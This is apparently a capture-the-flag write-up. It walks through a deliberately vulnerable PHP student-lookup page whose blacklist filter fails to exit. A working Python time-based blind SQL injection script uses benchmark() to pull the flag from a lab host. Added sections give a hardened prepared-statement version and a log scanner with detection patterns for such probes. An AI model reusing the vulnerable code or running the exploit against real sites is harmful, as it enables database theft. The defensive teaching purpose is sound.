Exercise Record
Code used to reproduce the challenge:
index.php
<?php
include 'config.php';
function stophack($string){ // blacklist filter: replaces forbidden tokens with "HongRi" and strips tags
    if(is_array($string)){
        foreach($string as $key => $val) {
            $string[$key] = stophack($val);
        }
    }
    else{
        $raw = $string;
        $replace = array("\\","\"","'","/","*","%5C","%22","%27","%2A","~","insert","update","delete","into","load_file","outfile","sleep",);
        $string = str_ireplace($replace, "HongRi", $string);
        $string = strip_tags($string);
        if($raw!=$string){
            error_log("Hacking attempt.");
            header('Location: /error/'); // no exit after the redirect: execution continues below
        }
        return trim($string);
    }
}
$conn = new mysqli($servername, $username, $password, $dbname);
if ($conn->connect_error) {
    die("连接失败: ");
}
if(isset($_GET['id']) && $_GET['id']){
    $id = stophack($_GET['id']);
    $sql = "SELECT * FROM students WHERE id=$id"; // the filtered id is concatenated straight into the query
    $result = $conn->query($sql);
    if($result->num_rows > 0){
        $row = $result->fetch_assoc();
        echo '<center><h1>查询结果为:</h1><pre>'.<<<EOF
+----+---------+--------------------+-------+
| id | name | email | score |
+----+---------+--------------------+-------+
| {$row['id']} | {$row['name']} | {$row['email']} | {$row['score']} |
+----+---------+--------------------+-------+</center>
EOF;
    }
}
else die("你所查询的对象id值不能为空!");
?>
config.php
<?php
$servername = "localhost";
$username = "root";
$password = "root";
$dbname = "day10";
?>
SQL statements used to build the CTF environment:
create database day10;
use day10;
create table students (
id int(6) unsigned auto_increment primary key,
name varchar(20) not null,
email varchar(30) not null,
score int(8) unsigned not null );
INSERT INTO students VALUES(1,'Lucia','[email protected]',100);
INSERT INTO students VALUES(2,'Danny','[email protected]',59);
INSERT INTO students VALUES(3,'Alina','[email protected]',66);
INSERT INTO students VALUES(4,'Jameson','[email protected]',13);
INSERT INTO students VALUES(5,'Allie','[email protected]',88);
create table flag(flag varchar(30) not null);
INSERT INTO flag VALUES('HRCTF{tim3_blind_Sql}');
Vulnerability Analysis:
Open the site:
http://10.211.55.2:100/day10/?id=1
The page renders normally, so we can work with it.
The challenge is adapted from a 0day flaw in a CMS. Looking at index.php it is obvious that the code concatenates the id parameter straight into the SQL statement at line 27 and then sends it to the database. A few lines earlier there is an attempt to filter the incoming GET parameter id; take a closer look at the filter function stophack.
We can clearly see that the stophack function has two problems: the filtering is not strict, and it does not exit immediately after detecting illegal characters.
If the program detects an illegal character or keyword it replaces it with the string HongRi, but it does not exit, so the attacker's input is still carried into the database query. Since keywords are merely replaced with HongRi, we need to bypass this blacklist.
Throughout the program no error message is shown when a SQL statement fails, so this has to be a blind injection. The developer evidently considered this and filtered the keyword sleep, but that does not stop an attacker from using blind injection to extract data. For blind injection with the sleep function disabled, refer directly to the article: MySQL delay inject new ideas. Here I use the benchmark function directly to get the flag.
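The two defects just described (a blacklist that only substitutes, and a redirect that never exits) are both avoidable. The following is an added example, not the challenge's code: the id lookup from index.php rewritten with allow-list validation, a prepared statement with a typed bound parameter, and a rejection path that actually terminates. It uses PDO with an in-memory SQLite database (pdo_sqlite extension assumed) so it runs stand-alone from the CLI; in the real application only the DSN and credentials would change. The two student rows are constructed sample data.

```php
<?php
// Added example, not the challenge's code: hardened form of the ?id= lookup.
// Assumes PHP 7.4+ with the pdo_sqlite extension; rows below are constructed samples.

declare(strict_types=1);

function openSampleDb(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE students (id INTEGER PRIMARY KEY, name TEXT NOT NULL, email TEXT NOT NULL, score INTEGER NOT NULL)');
    $insert = $db->prepare('INSERT INTO students (id, name, email, score) VALUES (?, ?, ?, ?)');
    foreach ([[1, 'Lucia', 'lucia@example.invalid', 100], [2, 'Danny', 'danny@example.invalid', 59]] as $row) {
        $insert->execute($row);
    }
    return $db;
}

// Allow-list validation instead of a blacklist: id must be a short, positive decimal
// integer (the column is int(6)). Anything else is rejected as a whole; nothing is
// "cleaned" and passed on the way stophack() does.
function parseId(string $raw): ?int {
    $raw = trim($raw);
    if ($raw === '' || strlen($raw) > 6 || !ctype_digit($raw)) {
        return null;
    }
    return (int)$raw;
}

// The SQL text is constant; the id travels as a typed bound parameter, so it can never
// change the structure of the query regardless of what a keyword filter lets through.
function findStudent(PDO $db, int $id): ?array {
    $stmt = $db->prepare('SELECT id, name, email, score FROM students WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Web entry point. The original filter calls header('Location: /error/') and then keeps
// going, so the query still runs; here the rejection is logged and execution stops.
function handleRequest(PDO $db, array $get): void {
    $raw = (string)($get['id'] ?? '');
    $id = parseId($raw);
    if ($id === null) {
        error_log(sprintf('Rejected id=%s from %s', substr($raw, 0, 200), $_SERVER['REMOTE_ADDR'] ?? 'cli'));
        header('Location: /error/');
        exit; // the step stophack() is missing
    }
    $row = findStudent($db, $id);
    if ($row === null) {
        echo "No student with id $id\n";
        return;
    }
    // Escape on output as well: stored names and emails are data, not markup.
    foreach ($row as $col => $val) {
        printf("%-5s %s\n", $col, htmlspecialchars((string)$val, ENT_QUOTES, 'UTF-8'));
    }
}

$db = openSampleDb();
handleRequest($db, ['id' => '2']); // a legitimate lookup prints Danny's row
var_dump(parseId('1'));            // a plain integer is accepted
// The write-up's time-based payload never reaches SQL: parseId() returns null for it.
var_dump(parseId('-1 or if(ascii(mid((select flag from flag),1,1))=72,benchmark(200000000,7^3^8),0)'));
```

The point is that correctness no longer depends on the completeness of a keyword list: even if a new delay function or an encoding trick slips past a filter, a non-numeric id is rejected before any query is built, and a numeric one is bound as an integer. The error_log line also gives the operations team a concrete event to alert on.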
Two other ways of doing time-based blind SQL injection (benchmark, heavy query)
The Python script is as follows:
import sys, string, requests

# Character set tried at each position; '#' marks "no candidate matched".
version_chars = ".-{}_" + string.ascii_letters + string.digits + '#'
flag = ""
for i in range(1, 40):
    for char in version_chars:
        # benchmark() stands in for the filtered sleep(): a correct guess makes the query slow.
        payload = "-1 or if(ascii(mid((select flag from flag),%s,1))=%s,benchmark(200000000,7^3^8),0)" % (i, ord(char))
        url = "http://10.211.55.2:100/day10/?id=%s" % payload
        if char == '#':
            # Every candidate for this position was tried without a timeout: stop.
            if flag:
                sys.stdout.write("\n[+] The flag is: %s" % flag)
                sys.stdout.flush()
            else:
                print("[-] Something run error!")
            exit()
        try:
            r = requests.post(url=url, timeout=2.0)
        except Exception as e:
            # A timeout means this guess was correct.
            flag += char
            sys.stdout.write("\r[-] Try to get flag: %s" % flag)
            sys.stdout.flush()
            break
print("[-] Something run error!")
result:
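From the defender's side, the loop above leaves a very recognisable trace in the web-server log: one client, one path, dozens of requests whose id parameter is not a number, contains a delay function, and occasionally takes seconds to answer. The following added example (not part of the write-up) scans access-log lines for that pattern. It assumes PHP 7.4 or later and Apache's combined LogFormat with %D (response time in microseconds) appended as the last field; the three log lines are constructed samples, not captures from the lab.

```php
<?php
// Added example, not from the write-up: flag the traffic pattern of a time-based blind
// injection against ?id=. Assumes PHP 7.4+ and the Apache combined log format with %D
// appended; the sample lines below are constructed.

declare(strict_types=1);

const SLOW_THRESHOLD_US = 2000000; // 2 s: the exploit's own timeout, so a hit is slower than this
const BURST_THRESHOLD   = 20;      // flag a client that sends this many requests to the path

// Apache combined log + %D. Captures: ip, timestamp, method, request-target, status, user-agent, microseconds.
const LOG_RE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)" (\d+)$/';

function parseLine(string $line): ?array {
    if (!preg_match(LOG_RE, $line, $m)) {
        return null;
    }
    $query = parse_url($m[4], PHP_URL_QUERY) ?: '';
    parse_str($query, $params); // also percent-decodes, so %20 and %5E become literal characters
    return [
        'ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'path' => parse_url($m[4], PHP_URL_PATH),
        'status' => (int)$m[5], 'ua' => $m[6], 'us' => (int)$m[7], 'params' => $params,
    ];
}

// Reasons a single request looks like a time-based probe, or [] if it looks benign.
function probeIndicators(array $req): array {
    $why = [];
    $id = (string)($req['params']['id'] ?? '');
    if ($id !== '' && !ctype_digit($id)) {
        $why[] = 'non-numeric id';
    }
    if (preg_match('/\b(benchmark|sleep)\s*\(/i', $id)) {
        $why[] = 'delay function in parameter';
    }
    // Latency alone is noisy (slow pages exist); only count it alongside a content indicator.
    if ($req['us'] > SLOW_THRESHOLD_US && $why) {
        $why[] = sprintf('slow response (%.1f s)', $req['us'] / 1e6);
    }
    return $why;
}

function analyzeLog(string $log): array {
    $perClient = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $req = parseLine($line);
        if ($req === null) {
            continue;
        }
        $ip = $req['ip'];
        $perClient[$ip] ??= ['requests' => 0, 'suspicious' => 0, 'reasons' => []];
        $perClient[$ip]['requests']++;
        $why = probeIndicators($req);
        if ($why) {
            $perClient[$ip]['suspicious']++;
            $perClient[$ip]['reasons'] = array_values(array_unique(array_merge($perClient[$ip]['reasons'], $why)));
        }
    }
    // A client whose requests are both numerous and mostly suspicious is the enumeration loop.
    foreach (array_keys($perClient) as $ip) {
        $c = $perClient[$ip];
        $perClient[$ip]['burst'] = $c['requests'] >= BURST_THRESHOLD && $c['suspicious'] > $c['requests'] / 2;
    }
    return $perClient;
}

// Constructed sample: one normal visitor and two probes from a scripted client.
$sampleLog = <<<'LOG'
10.0.0.5 - - [10/May/2020:12:00:01 +0800] "GET /day10/?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0" 4200
10.0.0.9 - - [10/May/2020:12:00:02 +0800] "GET /day10/?id=-1%20or%20if(ascii(mid((select%20flag%20from%20flag),1,1))=65,benchmark(200000000,7%5E3%5E8),0) HTTP/1.1" 200 512 "-" "python-requests/2.22.0" 3900
10.0.0.9 - - [10/May/2020:12:00:05 +0800] "GET /day10/?id=-1%20or%20if(ascii(mid((select%20flag%20from%20flag),1,1))=72,benchmark(200000000,7%5E3%5E8),0) HTTP/1.1" 200 512 "-" "python-requests/2.22.0" 6100234
LOG;

foreach (analyzeLog($sampleLog) as $ip => $c) {
    printf("%-10s requests=%d suspicious=%d burst=%s reasons=[%s]\n",
        $ip, $c['requests'], $c['suspicious'], $c['burst'] ? 'yes' : 'no', implode('; ', $c['reasons']));
}
```

On the sample, 10.0.0.5 produces no indicators while 10.0.0.9 is marked for a non-numeric id, a delay function and, on the second line, a slow response; the burst flag only turns on once a client has crossed BURST_THRESHOLD, which the real loop does within its first position since it tries every candidate character. The same three signals map directly onto a WAF rule or a SIEM correlation search.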